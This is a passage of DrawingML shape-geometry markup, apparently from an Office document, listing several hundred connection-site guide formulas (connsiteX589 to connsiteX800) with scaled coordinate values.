              <a:gd name="connsiteY589" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX590" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY590" fmla="*/ 9493742 h 26946982"/>
              <a:gd name="connsiteX591" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY591" fmla="*/ 9613786 h 26946982"/>
              <a:gd name="connsiteX592" fmla="*/ 14212090 w 23952872"/>
              <a:gd name="connsiteY592" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX593" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY593" fmla="*/ 9740782 h 26946982"/>
              <a:gd name="connsiteX594" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY594" fmla="*/ 9860812 h 26946982"/>
              <a:gd name="connsiteX595" fmla="*/ 14092059 w 23952872"/>
              <a:gd name="connsiteY595" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX596" fmla="*/ 13845039 w 23952872"/>
              <a:gd name="connsiteY596" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX597" fmla="*/ 13965055 w 23952872"/>
              <a:gd name="connsiteY597" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX598" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY598" fmla="*/ 9987817 h 26946982"/>
              <a:gd name="connsiteX599" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY599" fmla="*/ 10107830 h 26946982"/>
              <a:gd name="connsiteX600" fmla="*/ 13598021 w 23952872"/>
              <a:gd name="connsiteY600" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX601" fmla="*/ 13718031 w 23952872"/>
              <a:gd name="connsiteY601" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX602" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY602" fmla="*/ 10234840 h 26946982"/>
              <a:gd name="connsiteX603" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY603" fmla="*/ 10354848 h 26946982"/>
              <a:gd name="connsiteX604" fmla="*/ 13350986 w 23952872"/>
              <a:gd name="connsiteY604" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX605" fmla="*/ 13471011 w 23952872"/>
              <a:gd name="connsiteY605" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX606" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY606" fmla="*/ 10481864 h 26946982"/>
              <a:gd name="connsiteX607" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY607" fmla="*/ 10601883 h 26946982"/>
              <a:gd name="connsiteX608" fmla="*/ 13103968 w 23952872"/>
              <a:gd name="connsiteY608" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX609" fmla="*/ 13224007 w 23952872"/>
              <a:gd name="connsiteY609" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX610" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY610" fmla="*/ 10728865 h 26946982"/>
              <a:gd name="connsiteX611" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY611" fmla="*/ 10848900 h 26946982"/>
              <a:gd name="connsiteX612" fmla="*/ 12856950 w 23952872"/>
              <a:gd name="connsiteY612" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX613" fmla="*/ 12976972 w 23952872"/>
              <a:gd name="connsiteY613" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX614" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY614" fmla="*/ 10975899 h 26946982"/>
              <a:gd name="connsiteX615" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY615" fmla="*/ 11095921 h 26946982"/>
              <a:gd name="connsiteX616" fmla="*/ 12609915 w 23952872"/>
              <a:gd name="connsiteY616" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX617" fmla="*/ 12729954 w 23952872"/>
              <a:gd name="connsiteY617" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX618" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY618" fmla="*/ 11222918 h 26946982"/>
              <a:gd name="connsiteX619" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY619" fmla="*/ 11342956 h 26946982"/>
              <a:gd name="connsiteX620" fmla="*/ 12482919 w 23952872"/>
              <a:gd name="connsiteY620" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX621" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY621" fmla="*/ 11469952 h 26946982"/>
              <a:gd name="connsiteX622" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY622" fmla="*/ 11589974 h 26946982"/>
              <a:gd name="connsiteX623" fmla="*/ 12362900 w 23952872"/>
              <a:gd name="connsiteY623" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX624" fmla="*/ 12115885 w 23952872"/>
              <a:gd name="connsiteY624" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX625" fmla="*/ 12235893 w 23952872"/>
              <a:gd name="connsiteY625" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX626" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY626" fmla="*/ 11716979 h 26946982"/>
              <a:gd name="connsiteX627" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY627" fmla="*/ 11836986 h 26946982"/>
              <a:gd name="connsiteX628" fmla="*/ 11868856 w 23952872"/>
              <a:gd name="connsiteY628" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX629" fmla="*/ 11988883 w 23952872"/>
              <a:gd name="connsiteY629" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX630" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY630" fmla="*/ 11963988 h 26946982"/>
              <a:gd name="connsiteX631" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY631" fmla="*/ 12084013 h 26946982"/>
              <a:gd name="connsiteX632" fmla="*/ 11621821 w 23952872"/>
              <a:gd name="connsiteY632" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX633" fmla="*/ 11741860 w 23952872"/>
              <a:gd name="connsiteY633" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX634" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY634" fmla="*/ 12211012 h 26946982"/>
              <a:gd name="connsiteX635" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY635" fmla="*/ 12331050 h 26946982"/>
              <a:gd name="connsiteX636" fmla="*/ 11374809 w 23952872"/>
              <a:gd name="connsiteY636" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX637" fmla="*/ 11494836 w 23952872"/>
              <a:gd name="connsiteY637" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX638" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY638" fmla="*/ 12458032 h 26946982"/>
              <a:gd name="connsiteX639" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY639" fmla="*/ 12578062 h 26946982"/>
              <a:gd name="connsiteX640" fmla="*/ 11127791 w 23952872"/>
              <a:gd name="connsiteY640" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX641" fmla="*/ 11247812 w 23952872"/>
              <a:gd name="connsiteY641" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX642" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY642" fmla="*/ 12705058 h 26946982"/>
              <a:gd name="connsiteX643" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY643" fmla="*/ 12825080 h 26946982"/>
              <a:gd name="connsiteX644" fmla="*/ 10880767 w 23952872"/>
              <a:gd name="connsiteY644" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX645" fmla="*/ 11000806 w 23952872"/>
              <a:gd name="connsiteY645" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX646" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY646" fmla="*/ 12952065 h 26946982"/>
              <a:gd name="connsiteX647" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY647" fmla="*/ 13072098 h 26946982"/>
              <a:gd name="connsiteX648" fmla="*/ 10633849 w 23952872"/>
              <a:gd name="connsiteY648" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX649" fmla="*/ 10753760 w 23952872"/>
              <a:gd name="connsiteY649" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX650" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY650" fmla="*/ 13199111 h 26946982"/>
              <a:gd name="connsiteX651" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY651" fmla="*/ 13319020 h 26946982"/>
              <a:gd name="connsiteX652" fmla="*/ 10386814 w 23952872"/>
              <a:gd name="connsiteY652" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX653" fmla="*/ 10506853 w 23952872"/>
              <a:gd name="connsiteY653" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX654" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY654" fmla="*/ 13446013 h 26946982"/>
              <a:gd name="connsiteX655" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY655" fmla="*/ 13566054 h 26946982"/>
              <a:gd name="connsiteX656" fmla="*/ 10139796 w 23952872"/>
              <a:gd name="connsiteY656" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX657" fmla="*/ 10259827 w 23952872"/>
              <a:gd name="connsiteY657" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX658" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY658" fmla="*/ 13693044 h 26946982"/>
              <a:gd name="connsiteX659" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY659" fmla="*/ 13813075 h 26946982"/>
              <a:gd name="connsiteX660" fmla="*/ 9892756 w 23952872"/>
              <a:gd name="connsiteY660" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX661" fmla="*/ 10012795 w 23952872"/>
              <a:gd name="connsiteY661" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX662" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY662" fmla="*/ 13940076 h 26946982"/>
              <a:gd name="connsiteX663" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY663" fmla="*/ 14060112 h 26946982"/>
              <a:gd name="connsiteX664" fmla="*/ 9645743 w 23952872"/>
              <a:gd name="connsiteY664" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX665" fmla="*/ 9765783 w 23952872"/>
              <a:gd name="connsiteY665" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX666" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY666" fmla="*/ 14187086 h 26946982"/>
              <a:gd name="connsiteX667" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY667" fmla="*/ 14307125 h 26946982"/>
              <a:gd name="connsiteX668" fmla="*/ 9518742 w 23952872"/>
              <a:gd name="connsiteY668" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX669" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY669" fmla="*/ 14434132 h 26946982"/>
              <a:gd name="connsiteX670" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY670" fmla="*/ 14554143 h 26946982"/>
              <a:gd name="connsiteX671" fmla="*/ 9398728 w 23952872"/>
              <a:gd name="connsiteY671" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX672" fmla="*/ 9151713 w 23952872"/>
              <a:gd name="connsiteY672" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX673" fmla="*/ 9271725 w 23952872"/>
              <a:gd name="connsiteY673" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX674" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY674" fmla="*/ 14681144 h 26946982"/>
              <a:gd name="connsiteX675" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY675" fmla="*/ 14801155 h 26946982"/>
              <a:gd name="connsiteX676" fmla="*/ 9024712 w 23952872"/>
              <a:gd name="connsiteY676" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX677" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY677" fmla="*/ 14928159 h 26946982"/>
              <a:gd name="connsiteX678" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY678" fmla="*/ 15048200 h 26946982"/>
              <a:gd name="connsiteX679" fmla="*/ 8904671 w 23952872"/>
              <a:gd name="connsiteY679" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX680" fmla="*/ 8657655 w 23952872"/>
              <a:gd name="connsiteY680" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX681" fmla="*/ 8777672 w 23952872"/>
              <a:gd name="connsiteY681" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX682" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY682" fmla="*/ 15175197 h 26946982"/>
              <a:gd name="connsiteX683" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY683" fmla="*/ 15295213 h 26946982"/>
              <a:gd name="connsiteX684" fmla="*/ 8410643 w 23952872"/>
              <a:gd name="connsiteY684" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX685" fmla="*/ 8530654 w 23952872"/>
              <a:gd name="connsiteY685" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX686" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY686" fmla="*/ 15422215 h 26946982"/>
              <a:gd name="connsiteX687" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY687" fmla="*/ 15542226 h 26946982"/>
              <a:gd name="connsiteX688" fmla="*/ 8163602 w 23952872"/>
              <a:gd name="connsiteY688" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX689" fmla="*/ 8283639 w 23952872"/>
              <a:gd name="connsiteY689" fmla="*/ 4 h 26946982"/>
              <a:gd name="connsiteX690" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY690" fmla="*/ 15669232 h 26946982"/>
              <a:gd name="connsiteX691" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY691" fmla="*/ 15789269 h 26946982"/>
              <a:gd name="connsiteX692" fmla="*/ 7916590 w 23952872"/>
              <a:gd name="connsiteY692" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX693" fmla="*/ 8036596 w 23952872"/>
              <a:gd name="connsiteY693" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX694" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY694" fmla="*/ 15916273 h 26946982"/>
              <a:gd name="connsiteX695" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY695" fmla="*/ 16036275 h 26946982"/>
              <a:gd name="connsiteX696" fmla="*/ 7422526 w 23952872"/>
              <a:gd name="connsiteY696" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX697" fmla="*/ 7542554 w 23952872"/>
              <a:gd name="connsiteY697" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX698" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY698" fmla="*/ 16410317 h 26946982"/>
              <a:gd name="connsiteX699" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY699" fmla="*/ 16530345 h 26946982"/>
              <a:gd name="connsiteX700" fmla="*/ 7175508 w 23952872"/>
              <a:gd name="connsiteY700" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX701" fmla="*/ 7295525 w 23952872"/>
              <a:gd name="connsiteY701" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX702" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY702" fmla="*/ 16657344 h 26946982"/>
              <a:gd name="connsiteX703" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY703" fmla="*/ 16777363 h 26946982"/>
              <a:gd name="connsiteX704" fmla="*/ 7789583 w 23952872"/>
              <a:gd name="connsiteY704" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX705" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY705" fmla="*/ 16163288 h 26946982"/>
              <a:gd name="connsiteX706" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY706" fmla="*/ 16283322 h 26946982"/>
              <a:gd name="connsiteX707" fmla="*/ 7669550 w 23952872"/>
              <a:gd name="connsiteY707" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX708" fmla="*/ 7048513 w 23952872"/>
              <a:gd name="connsiteY708" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX709" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY709" fmla="*/ 16904359 h 26946982"/>
              <a:gd name="connsiteX710" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY710" fmla="*/ 17024381 h 26946982"/>
              <a:gd name="connsiteX711" fmla="*/ 6928490 w 23952872"/>
              <a:gd name="connsiteY711" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX712" fmla="*/ 6801500 w 23952872"/>
              <a:gd name="connsiteY712" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX713" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY713" fmla="*/ 17151371 h 26946982"/>
              <a:gd name="connsiteX714" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY714" fmla="*/ 17271410 h 26946982"/>
              <a:gd name="connsiteX715" fmla="*/ 6681461 w 23952872"/>
              <a:gd name="connsiteY715" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX716" fmla="*/ 6554460 w 23952872"/>
              <a:gd name="connsiteY716" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX717" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY717" fmla="*/ 17398408 h 26946982"/>
              <a:gd name="connsiteX718" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY718" fmla="*/ 17518428 h 26946982"/>
              <a:gd name="connsiteX719" fmla="*/ 6434443 w 23952872"/>
              <a:gd name="connsiteY719" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX720" fmla="*/ 6307442 w 23952872"/>
              <a:gd name="connsiteY720" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX721" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY721" fmla="*/ 17645423 h 26946982"/>
              <a:gd name="connsiteX722" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY722" fmla="*/ 17765460 h 26946982"/>
              <a:gd name="connsiteX723" fmla="*/ 6187408 w 23952872"/>
              <a:gd name="connsiteY723" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX724" fmla="*/ 6060407 w 23952872"/>
              <a:gd name="connsiteY724" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX725" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY725" fmla="*/ 17892464 h 26946982"/>
              <a:gd name="connsiteX726" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY726" fmla="*/ 18012480 h 26946982"/>
              <a:gd name="connsiteX727" fmla="*/ 5940390 w 23952872"/>
              <a:gd name="connsiteY727" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX728" fmla="*/ 5813384 w 23952872"/>
              <a:gd name="connsiteY728" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX729" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY729" fmla="*/ 18139487 h 26946982"/>
              <a:gd name="connsiteX730" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY730" fmla="*/ 18259515 h 26946982"/>
              <a:gd name="connsiteX731" fmla="*/ 5693356 w 23952872"/>
              <a:gd name="connsiteY731" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX732" fmla="*/ 5566366 w 23952872"/>
              <a:gd name="connsiteY732" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX733" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY733" fmla="*/ 18386502 h 26946982"/>
              <a:gd name="connsiteX734" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY734" fmla="*/ 18506524 h 26946982"/>
              <a:gd name="connsiteX735" fmla="*/ 5446343 w 23952872"/>
              <a:gd name="connsiteY735" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX736" fmla="*/ 5319353 w 23952872"/>
              <a:gd name="connsiteY736" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX737" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY737" fmla="*/ 18633514 h 26946982"/>
              <a:gd name="connsiteX738" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY738" fmla="*/ 18753542 h 26946982"/>
              <a:gd name="connsiteX739" fmla="*/ 5199326 w 23952872"/>
              <a:gd name="connsiteY739" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX740" fmla="*/ 5072318 w 23952872"/>
              <a:gd name="connsiteY740" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX741" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY741" fmla="*/ 18880549 h 26946982"/>
              <a:gd name="connsiteX742" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY742" fmla="*/ 19000577 h 26946982"/>
              <a:gd name="connsiteX743" fmla="*/ 4952290 w 23952872"/>
              <a:gd name="connsiteY743" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX744" fmla="*/ 4705278 w 23952872"/>
              <a:gd name="connsiteY744" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX745" fmla="*/ 4825312 w 23952872"/>
              <a:gd name="connsiteY745" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX746" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY746" fmla="*/ 19127556 h 26946982"/>
              <a:gd name="connsiteX747" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY747" fmla="*/ 19247592 h 26946982"/>
              <a:gd name="connsiteX748" fmla="*/ 4458249 w 23952872"/>
              <a:gd name="connsiteY748" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX749" fmla="*/ 4578277 w 23952872"/>
              <a:gd name="connsiteY749" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX750" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY750" fmla="*/ 19374591 h 26946982"/>
              <a:gd name="connsiteX751" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY751" fmla="*/ 19494618 h 26946982"/>
              <a:gd name="connsiteX752" fmla="*/ 4211226 w 23952872"/>
              <a:gd name="connsiteY752" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX753" fmla="*/ 4331248 w 23952872"/>
              <a:gd name="connsiteY753" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX754" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY754" fmla="*/ 19621620 h 26946982"/>
              <a:gd name="connsiteX755" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY755" fmla="*/ 19741645 h 26946982"/>
              <a:gd name="connsiteX756" fmla="*/ 3964196 w 23952872"/>
              <a:gd name="connsiteY756" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX757" fmla="*/ 4084225 w 23952872"/>
              <a:gd name="connsiteY757" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX758" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY758" fmla="*/ 19868646 h 26946982"/>
              <a:gd name="connsiteX759" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY759" fmla="*/ 19988671 h 26946982"/>
              <a:gd name="connsiteX760" fmla="*/ 3717195 w 23952872"/>
              <a:gd name="connsiteY760" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX761" fmla="*/ 3837201 w 23952872"/>
              <a:gd name="connsiteY761" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX762" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY762" fmla="*/ 20115667 h 26946982"/>
              <a:gd name="connsiteX763" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY763" fmla="*/ 20235673 h 26946982"/>
              <a:gd name="connsiteX764" fmla="*/ 3470149 w 23952872"/>
              <a:gd name="connsiteY764" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX765" fmla="*/ 3590189 w 23952872"/>
              <a:gd name="connsiteY765" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX766" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY766" fmla="*/ 20362682 h 26946982"/>
              <a:gd name="connsiteX767" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY767" fmla="*/ 20482718 h 26946982"/>
              <a:gd name="connsiteX768" fmla="*/ 3223131 w 23952872"/>
              <a:gd name="connsiteY768" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX769" fmla="*/ 3343160 w 23952872"/>
              <a:gd name="connsiteY769" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX770" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY770" fmla="*/ 20609708 h 26946982"/>
              <a:gd name="connsiteX771" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY771" fmla="*/ 20729736 h 26946982"/>
              <a:gd name="connsiteX772" fmla="*/ 2976102 w 23952872"/>
              <a:gd name="connsiteY772" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX773" fmla="*/ 3096141 w 23952872"/>
              <a:gd name="connsiteY773" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX774" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY774" fmla="*/ 20856726 h 26946982"/>
              <a:gd name="connsiteX775" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY775" fmla="*/ 20976765 h 26946982"/>
              <a:gd name="connsiteX776" fmla="*/ 2729079 w 23952872"/>
              <a:gd name="connsiteY776" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX777" fmla="*/ 2849118 w 23952872"/>
              <a:gd name="connsiteY777" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX778" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY778" fmla="*/ 21103749 h 26946982"/>
              <a:gd name="connsiteX779" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY779" fmla="*/ 21223789 h 26946982"/>
              <a:gd name="connsiteX780" fmla="*/ 2482066 w 23952872"/>
              <a:gd name="connsiteY780" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX781" fmla="*/ 2602083 w 23952872"/>
              <a:gd name="connsiteY781" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX782" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY782" fmla="*/ 21350784 h 26946982"/>
              <a:gd name="connsiteX783" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY783" fmla="*/ 21470802 h 26946982"/>
              <a:gd name="connsiteX784" fmla="*/ 2235048 w 23952872"/>
              <a:gd name="connsiteY784" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX785" fmla="*/ 2355065 w 23952872"/>
              <a:gd name="connsiteY785" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX786" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY786" fmla="*/ 21597805 h 26946982"/>
              <a:gd name="connsiteX787" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY787" fmla="*/ 21717820 h 26946982"/>
              <a:gd name="connsiteX788" fmla="*/ 1988014 w 23952872"/>
              <a:gd name="connsiteY788" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX789" fmla="*/ 2108052 w 23952872"/>
              <a:gd name="connsiteY789" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX790" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY790" fmla="*/ 21844818 h 26946982"/>
              <a:gd name="connsiteX791" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY791" fmla="*/ 21964858 h 26946982"/>
              <a:gd name="connsiteX792" fmla="*/ 1740996 w 23952872"/>
              <a:gd name="connsiteY792" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX793" fmla="*/ 1861012 w 23952872"/>
              <a:gd name="connsiteY793" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX794" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY794" fmla="*/ 22091855 h 26946982"/>
              <a:gd name="connsiteX795" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY795" fmla="*/ 22211876 h 26946982"/>
              <a:gd name="connsiteX796" fmla="*/ 1493972 w 23952872"/>
              <a:gd name="connsiteY796" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX797" fmla="*/ 1613989 w 23952872"/>
              <a:gd name="connsiteY797" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX798" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY798" fmla="*/ 22338878 h 26946982"/>
              <a:gd name="connsiteX799" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY799" fmla="*/ 22458896 h 26946982"/>
              <a:gd name="connsiteX800" fmla="*/ 1246949 w 23952872"/>
